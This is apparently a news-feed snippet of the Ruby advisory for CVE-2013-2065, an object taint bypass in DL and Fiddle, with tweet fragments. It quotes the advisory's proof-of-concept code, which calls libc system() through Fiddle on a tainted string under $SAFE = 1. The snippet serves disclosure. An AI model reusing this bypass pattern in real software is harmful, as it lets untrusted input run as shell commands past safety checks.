14 May '13, 3pm

DL および Fiddle におけるオブジェクト汚染フラグバイパス (CVE-2013-2065): DL および Fiddle に、$SAFE...

def my_function(input) handle = DL.dlopen(nil) sys = Fiddle::Function.new(handle['system'], [Fiddle::TYPE_VOIDP], Fiddle::TYPE_INT) sys.call input end $SAFE = 1 user_input = "uname -rs".taint my_function DL::CPtr[user_input].to_i

Full article: http://www.ruby-lang.org/ja/news/2013/05/14/taint-bypass-...

Tweets

Object taint bypassing in DL and Fiddle in Ruby...

ruby-lang.org 14 May '13, 2pm

Object taint bypassing in DL and Fiddle in Ruby (CVE-2013-2065) There is a vulnerability in DL and Fiddle in Ruby where ta...